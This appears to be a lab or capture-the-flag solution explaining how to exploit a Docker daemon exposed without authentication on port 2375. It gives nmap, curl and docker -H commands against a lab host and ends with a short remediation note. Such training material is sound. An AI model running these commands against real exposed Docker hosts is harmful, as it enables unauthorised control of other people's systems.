Exploiting docker misconfiguration - Solution
The Docker daemon can listen for Docker Engine API requests via three different types of Socket
unix
,tcp
, andfd
. To access remotely we have to enabletcp
socket. The default setup provides un-encrypted and un-authenticated direct access to the Docker daemon. It is conventional to use port2375
for un-encrypted, and port2376
for encrypted communication with the daemon.
- Scan the
2375
and2376
port using nmap from student VM
nmap -p 2375,2376 -n 192.168.56.4 -v
- We can query the docker API using
curl
curl 192.168.56.4:2375/images/json | jq .
- Attacker can abuse this by using the docker daemon configuration to access the host system's docker runtime
docker -H tcp://CTFVMIP:2375 ps
docker -H tcp://CTFVMIP:2375 images
- Now, we have full privilege over the host system :)
Fixing this vulnerability
- Use the
2376
port for exposing if required to expose the Docker API. Otherwise usefd
orsocket
to expose the docker runtime daemon